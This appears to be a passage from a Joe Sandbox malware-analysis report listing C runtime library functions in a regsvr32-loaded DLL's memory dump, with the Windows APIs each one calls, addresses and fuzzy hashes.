Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: free$_errno$DecodeEnvironmentPointerVariable__wtomb_environ
String ID:
API String ID: 3451773520-0
Opcode ID: e694225545c17882180803efd4dd10bf6022db2104e00cc5aed2eaf73a595679
Instruction ID: 457f347f5e7ab25b2db9d9502b4af5c5c5c3ef8d37dccb1bddf791623ede08f4
Opcode Fuzzy Hash: e694225545c17882180803efd4dd10bf6022db2104e00cc5aed2eaf73a595679
Instruction Fuzzy Hash: 95A1F535E09F6A87FA10AF17A90827A639ABF407D8F148635DD1D477F5CE3CA4558308

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7EE23C Relevance: 13.7, APIs: 9, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CB7EE292
GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CB7EE2B1
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CB7EE356
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CB7EE3B5
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CB7EE3F0
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CB7EE42C
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CB7EE46C
free.LIBCMT ref: 00007FF8CB7EE47A
free.LIBCMT ref: 00007FF8CB7EE49C

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: ByteCharMultiWide$Infofree
String ID:
API String ID: 1638741495-0
Opcode ID: ce8117ab18d8874cf8440c92ec5f3b21420e9de26f709fb2524c2ddf018fd4d7
Instruction ID: 8e7ab08112e64dfbd81c815ccf0052cf73263a97964ff6afc5c7f15fc34170c6
Opcode Fuzzy Hash: ce8117ab18d8874cf8440c92ec5f3b21420e9de26f709fb2524c2ddf018fd4d7
Instruction Fuzzy Hash: 8161A132A08FD28BE7609F26A4405B976D5BF847E8F544A35EE5D46BF8DF3CE5418200

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E352C Relevance: 13.6, APIs: 9, Instructions: 98COMMON

Download Yara Rule

APIs

_lock.LIBCMT ref: 00007FF8CB7E3555
DecodePointer.KERNEL32 ref: 00007FF8CB7E3588
DecodePointer.KERNEL32 ref: 00007FF8CB7E35A5
DecodePointer.KERNEL32 ref: 00007FF8CB7E35E4
DecodePointer.KERNEL32 ref: 00007FF8CB7E35FD
DecodePointer.KERNEL32 ref: 00007FF8CB7E360C
_initterm.LIBCMT ref: 00007FF8CB7E364B
_initterm.LIBCMT ref: 00007FF8CB7E365E
ExitProcess.KERNEL32 ref: 00007FF8CB7E3697

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: DecodePointer$_initterm$ExitProcess_lock
String ID:
API String ID: 2551688548-0
Opcode ID: 7b592d45c7ca6c6d8cb3fd2d09d1fb2d25a7c433dc9c00e1470d97789b8f3c14
Instruction ID: 96d0048a974f539e17259efce1efa834c0932b898bfa4ffe47c7ae10730d9a47
Opcode Fuzzy Hash: 7b592d45c7ca6c6d8cb3fd2d09d1fb2d25a7c433dc9c00e1470d97789b8f3c14
Instruction Fuzzy Hash: E9417B31A0AFA68AEA519F17E84013A7294BF88BC4F450034EE4E47BB5DF3CE4528709

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E8F34 Relevance: 12.2, APIs: 8, Instructions: 173COMMONLIBRARYCODE

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FF8CB7E9206), ref: 00007FF8CB7E8F94
GetLastError.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FF8CB7E9206), ref: 00007FF8CB7E8FA6
MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FF8CB7E9206), ref: 00007FF8CB7E9006
MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FF8CB7E9206), ref: 00007FF8CB7E90BC
GetStringTypeW.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FF8CB7E9206), ref: 00007FF8CB7E90D3
free.LIBCMT ref: 00007FF8CB7E90E4
GetStringTypeA.KERNEL32(?,?,?,?,00000000,0000000A,00000008,00007FF8CB7E9206), ref: 00007FF8CB7E9161
free.LIBCMT ref: 00007FF8CB7E9171

Part of subcall function 00007FF8CB7EE23C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CB7EE292
Part of subcall function 00007FF8CB7EE23C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CB7EE2B1
Part of subcall function 00007FF8CB7EE23C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CB7EE3B5
Part of subcall function 00007FF8CB7EE23C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00007FF8CB7EE3F0

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: ByteCharMultiWide$StringType$Infofree$ErrorLast
String ID:
API String ID: 3535580693-0
Opcode ID: 851e935c27dd1964d5f09fdb64281df2a61b0302174b786e63cdd007473657bb
Instruction ID: f8ae20ef53fb0d5f4cbff9d0d93232e7cdd96b260dcee2438c6b0ebf36723cdc
Opcode Fuzzy Hash: 851e935c27dd1964d5f09fdb64281df2a61b0302174b786e63cdd007473657bb
Instruction Fuzzy Hash: 06617F32B08FE68BEB609F2698444697792FF44BE4F540635EE1D57BB4DE38E9418340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E3758 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 199COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32 ref: 00007FF8CB7E377D

Part of subcall function 00007FF8CB7E3108: Sleep.KERNEL32(?,?,0000000A,00007FF8CB7E2DA3,?,?,?,00007FF8CB7E2DFF,?,?,?,00007FF8CB7E254F,?,?,?,00007FF8CB7E262A), ref: 00007FF8CB7E314D

GetFileType.KERNEL32 ref: 00007FF8CB7E38FA

Strings

@, xrefs: 00007FF8CB7E39F5

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: FileInfoSleepStartupType
String ID: @
API String ID: 1527402494-2766056989
Opcode ID: be5b348199184886c2585225aa819b02cc7fe3bfefb3d916d7442fb5369bb0a2
Instruction ID: dc7fed1f15a30684ac299580325be95c7e44f135c17c3c8a8eda9381ce44c191
Opcode Fuzzy Hash: be5b348199184886c2585225aa819b02cc7fe3bfefb3d916d7442fb5369bb0a2
Instruction Fuzzy Hash: CB919E22A18BE28AE7118F26844862927A5FF057B4F664735DA7D477F0DF7CE882C311

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E25F8 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 195COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF8CB7E2534: _getptd.LIBCMT ref: 00007FF8CB7E254A

_errno.LIBCMT ref: 00007FF8CB7E2638
_errno.LIBCMT ref: 00007FF8CB7E27F2

Strings

0, xrefs: 00007FF8CB7E2731
0, xrefs: 00007FF8CB7E2703
-, xrefs: 00007FF8CB7E26CA
+, xrefs: 00007FF8CB7E26D5

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: _errno$_getptd
String ID: +$-$0$0
API String ID: 3432092939-699404926
Opcode ID: 8efefd5caa40435472e3a9c676caa775b17fe32abe7b41ee90b269364e345ab9
Instruction ID: d11c0432dbf8ac3da3fb606f42d6719ea3ddc4b16a956a38aae919c4ff5fea63
Opcode Fuzzy Hash: 8efefd5caa40435472e3a9c676caa775b17fe32abe7b41ee90b269364e345ab9
Instruction Fuzzy Hash: 13718D32D0CFE28AF7B64E16841537A3691AF447E4F294236CF5A226F1DE6CE881C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E6AB8 Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

_FF_MSGBANNER.LIBCMT ref: 00007FF8CB7E6ADF

Part of subcall function 00007FF8CB7E6F0C: GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FF8CB7E7194,?,?,?,?,00007FF8CB7E6C69,?,?,00000000,00007FF8CB7E30C0), ref: 00007FF8CB7E6FCF

Part of subcall function 00007FF8CB7E334C: ExitProcess.KERNEL32 ref: 00007FF8CB7E335B

Part of subcall function 00007FF8CB7E309C: Sleep.KERNEL32(?,?,00000000,00007FF8CB7E6B19,?,?,00000000,00007FF8CB7E6BC3,?,?,?,?,?,?,00000000,00007FF8CB7E2DC8), ref: 00007FF8CB7E30D2

_errno.LIBCMT ref: 00007FF8CB7E6B21
_lock.LIBCMT ref: 00007FF8CB7E6B35
free.LIBCMT ref: 00007FF8CB7E6B57
_errno.LIBCMT ref: 00007FF8CB7E6B5C
LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF8CB7E6BC3,?,?,?,?,?,?,00000000,00007FF8CB7E2DC8,?,?,?,00007FF8CB7E2DFF), ref: 00007FF8CB7E6B82

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: _errno$CriticalExitFileLeaveModuleNameProcessSectionSleep_lockfree
String ID:
API String ID: 1354249094-0
Opcode ID: 281a6b99e1ceef077376b7d12b8049e3985eb177f8c0a9ab58ee7c303b441a02
Instruction ID: b19095e8d8d2da7efd678a7e008d691869db9a746f5ddce95ca60175d8bf1017
Opcode Fuzzy Hash: 281a6b99e1ceef077376b7d12b8049e3985eb177f8c0a9ab58ee7c303b441a02
Instruction Fuzzy Hash: A1217920E18FA28BF661AF52A44037A62A5EF847D4F145134EE4E477F2CF7CE8418700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E2D70 Relevance: 9.0, APIs: 6, Instructions: 37threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF8CB7E2DFF,?,?,?,00007FF8CB7E254F,?,?,?,00007FF8CB7E262A), ref: 00007FF8CB7E2D7A
FlsGetValue.KERNEL32(?,?,?,00007FF8CB7E2DFF,?,?,?,00007FF8CB7E254F,?,?,?,00007FF8CB7E262A), ref: 00007FF8CB7E2D88
SetLastError.KERNEL32(?,?,?,00007FF8CB7E2DFF,?,?,?,00007FF8CB7E254F,?,?,?,00007FF8CB7E262A), ref: 00007FF8CB7E2DE0

Part of subcall function 00007FF8CB7E3108: Sleep.KERNEL32(?,?,0000000A,00007FF8CB7E2DA3,?,?,?,00007FF8CB7E2DFF,?,?,?,00007FF8CB7E254F,?,?,?,00007FF8CB7E262A), ref: 00007FF8CB7E314D

FlsSetValue.KERNEL32(?,?,?,00007FF8CB7E2DFF,?,?,?,00007FF8CB7E254F,?,?,?,00007FF8CB7E262A), ref: 00007FF8CB7E2DB4
free.LIBCMT ref: 00007FF8CB7E2DD7

Part of subcall function 00007FF8CB7E2CBC: _lock.LIBCMT ref: 00007FF8CB7E2D0C
Part of subcall function 00007FF8CB7E2CBC: _lock.LIBCMT ref: 00007FF8CB7E2D2C

GetCurrentThreadId.KERNEL32 ref: 00007FF8CB7E2DC8

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: ErrorLastValue_lock$CurrentSleepThreadfree
String ID:
API String ID: 3106088686-0
Opcode ID: 1a58bbec3c0441b91cbee7445021737d92780d7df2029101222d8d22fa3fe0c2
Instruction ID: e5e83a9b0349ae23ad3dd05377316c3ce833c405eeb8c3452471126ca7f2d807
Opcode Fuzzy Hash: 1a58bbec3c0441b91cbee7445021737d92780d7df2029101222d8d22fa3fe0c2
Instruction Fuzzy Hash: 00015E31A09FA68BEA559F67944453833A2AF487E0F184234DE2E023F1EE3CE449D614

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E9DF8 Relevance: 8.8, APIs: 7, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 00007FF8CB7E9E16

Part of subcall function 00007FF8CB7E3024: HeapFree.KERNEL32(?,?,00000000,00007FF8CB7E2DDC,?,?,?,00007FF8CB7E2DFF,?,?,?,00007FF8CB7E254F,?,?,?,00007FF8CB7E262A), ref: 00007FF8CB7E303A
Part of subcall function 00007FF8CB7E3024: _errno.LIBCMT ref: 00007FF8CB7E3044
Part of subcall function 00007FF8CB7E3024: GetLastError.KERNEL32(?,?,00000000,00007FF8CB7E2DDC,?,?,?,00007FF8CB7E2DFF,?,?,?,00007FF8CB7E254F,?,?,?,00007FF8CB7E262A), ref: 00007FF8CB7E304C

free.LIBCMT ref: 00007FF8CB7E9E28
free.LIBCMT ref: 00007FF8CB7E9E3A
free.LIBCMT ref: 00007FF8CB7E9E4C
free.LIBCMT ref: 00007FF8CB7E9E5E
free.LIBCMT ref: 00007FF8CB7E9E70
free.LIBCMT ref: 00007FF8CB7E9E82

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: free$ErrorFreeHeapLast_errno
String ID:
API String ID: 1012874770-0
Opcode ID: 2467c4f6b5832abe9fd2be6a03a61b6f94b407d58b9f6526efad8e926ce1459f
Instruction ID: c0e46b281f34b54f1d4a5a01b9d7f5bfc67469ed9a1698567356086eb3537f54
Opcode Fuzzy Hash: 2467c4f6b5832abe9fd2be6a03a61b6f94b407d58b9f6526efad8e926ce1459f
Instruction Fuzzy Hash: D801A813A08EA6DFEE65EF63D4524756362AF80B90F491031DE0E469B2CE6DF880C314

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E9E90 Relevance: 7.7, APIs: 6, Instructions: 246COMMON

Download Yara Rule

APIs

free.LIBCMT ref: 00007FF8CB7E9F10
free.LIBCMT ref: 00007FF8CB7E9F37
free.LIBCMT ref: 00007FF8CB7EA208
free.LIBCMT ref: 00007FF8CB7EA214

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 66c2a68ae6921ce3eae9ed6cb47659e8359417b2a45b1d2ea151f135524af05a
Instruction ID: 3cbfaa14777722f08211b6085801bc571acdd1d3341b178fc56ed72575e78130
Opcode Fuzzy Hash: 66c2a68ae6921ce3eae9ed6cb47659e8359417b2a45b1d2ea151f135524af05a
Instruction Fuzzy Hash: D3B16D32B19F968AEB20DF62E4405AA77A5FB95784F404531EE8E43BA5EF3CE105C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E60B0 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF8CB7E60F3
free.LIBCMT ref: 00007FF8CB7E6133
free.LIBCMT ref: 00007FF8CB7E6153
free.LIBCMT ref: 00007FF8CB7E61B0
free.LIBCMT ref: 00007FF8CB7E61C8

Part of subcall function 00007FF8CB7E3108: Sleep.KERNEL32(?,?,0000000A,00007FF8CB7E2DA3,?,?,?,00007FF8CB7E2DFF,?,?,?,00007FF8CB7E254F,?,?,?,00007FF8CB7E262A), ref: 00007FF8CB7E314D

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: free$Sleep_errno
String ID:
API String ID: 2081351063-0
Opcode ID: ec136e1b37b0cf75a1e1cbd0173697211363db55ec0de315659f58b3930cb5b5
Instruction ID: bf783cdc1e512498a55c913ad3cc5672ed894edc8018d19a2cb5e2413952c69e
Opcode Fuzzy Hash: ec136e1b37b0cf75a1e1cbd0173697211363db55ec0de315659f58b3930cb5b5
Instruction Fuzzy Hash: 25311D61A08FA68AEB569F27C45167D76A1AF44FC4F498035EE0D0B7BADE3CE8108340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E72D4 Relevance: 7.6, APIs: 5, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,00007FF8CB7E73E5,?,?,?,?,00007FF8CB7E34D2,?,?,?,00007FF8CB7E21CB), ref: 00007FF8CB7E72FD
DecodePointer.KERNEL32(?,?,?,00007FF8CB7E73E5,?,?,?,?,00007FF8CB7E34D2,?,?,?,00007FF8CB7E21CB), ref: 00007FF8CB7E730C

Part of subcall function 00007FF8CB7ED070: _errno.LIBCMT ref: 00007FF8CB7ED079

EncodePointer.KERNEL32(?,?,?,00007FF8CB7E73E5,?,?,?,?,00007FF8CB7E34D2,?,?,?,00007FF8CB7E21CB), ref: 00007FF8CB7E7389

Part of subcall function 00007FF8CB7E318C: realloc.LIBCMT ref: 00007FF8CB7E31B7
Part of subcall function 00007FF8CB7E318C: Sleep.KERNEL32(?,?,00000000,00007FF8CB7E7379,?,?,?,00007FF8CB7E73E5,?,?,?,?,00007FF8CB7E34D2), ref: 00007FF8CB7E31D3

EncodePointer.KERNEL32(?,?,?,00007FF8CB7E73E5,?,?,?,?,00007FF8CB7E34D2,?,?,?,00007FF8CB7E21CB), ref: 00007FF8CB7E7398
EncodePointer.KERNEL32(?,?,?,00007FF8CB7E73E5,?,?,?,?,00007FF8CB7E34D2,?,?,?,00007FF8CB7E21CB), ref: 00007FF8CB7E73A4

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: Pointer$Encode$Decode$Sleep_errnorealloc
String ID:
API String ID: 1310268301-0
Opcode ID: 45f99762a2f7ec127277c333d1f44571b1c8f3f0bb701b28e9aac5b400b42b2d
Instruction ID: 52fcb2c40569121345a1a42ef61bc46c65be44e49c8c00bda4a94b785783ff78
Opcode Fuzzy Hash: 45f99762a2f7ec127277c333d1f44571b1c8f3f0bb701b28e9aac5b400b42b2d
Instruction Fuzzy Hash: 6D217C21B09FE64AEA50AF63E5441BAB391BF55BC0F444835DD0D0B7BADE7CE4858304

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E71A4 Relevance: 7.6, APIs: 5, Instructions: 65COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32 ref: 00007FF8CB7E71C6
DecodePointer.KERNEL32 ref: 00007FF8CB7E71D5

Part of subcall function 00007FF8CB7ED070: _errno.LIBCMT ref: 00007FF8CB7ED079

EncodePointer.KERNEL32 ref: 00007FF8CB7E7248

Part of subcall function 00007FF8CB7E318C: realloc.LIBCMT ref: 00007FF8CB7E31B7
Part of subcall function 00007FF8CB7E318C: Sleep.KERNEL32(?,?,00000000,00007FF8CB7E7379,?,?,?,00007FF8CB7E73E5,?,?,?,?,00007FF8CB7E34D2), ref: 00007FF8CB7E31D3

EncodePointer.KERNEL32 ref: 00007FF8CB7E7257
EncodePointer.KERNEL32 ref: 00007FF8CB7E7263

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: Pointer$Encode$Decode$Sleep_errnorealloc
String ID:
API String ID: 1310268301-0
Opcode ID: eece0b224e2bcc70f9921190d9f8722cba86776407b6ce9ac89865c4675fc459
Instruction ID: eaa947e95d5200c81b1977740cacc1fd82e1f16e45ab6a8d8ac5384a69312e29
Opcode Fuzzy Hash: eece0b224e2bcc70f9921190d9f8722cba86776407b6ce9ac89865c4675fc459
Instruction Fuzzy Hash: 2D217C21B0AFE69AEE04EF13E54427AA365AF45BC0F484435EE4D0B7B6DE3CE1458304

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8CB7E3310 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,000000FF,00007FF8CB7E3359,?,?,00000028,00007FF8CB7E6C7D,?,?,00000000,00007FF8CB7E30C0,?,?,00000000,00007FF8CB7E6B19), ref: 00007FF8CB7E331F
GetProcAddress.KERNEL32(?,?,000000FF,00007FF8CB7E3359,?,?,00000028,00007FF8CB7E6C7D,?,?,00000000,00007FF8CB7E30C0,?,?,00000000,00007FF8CB7E6B19), ref: 00007FF8CB7E3334

Strings

mscoree.dll, xrefs: 00007FF8CB7E3318
CorExitProcess, xrefs: 00007FF8CB7E332A

Memory Dump Source

Source File: 00000002.00000002.367441695.00007FF8CB7A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CB7A0000, based on PE: true

Associated: 00000002.00000002.367431544.00007FF8CB7A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367517826.00007FF8CB7F2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367685034.00007FF8CB7F6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.367739659.00007FF8CB7F9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8cb7a0000_regsvr32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 1646373207-1276376045
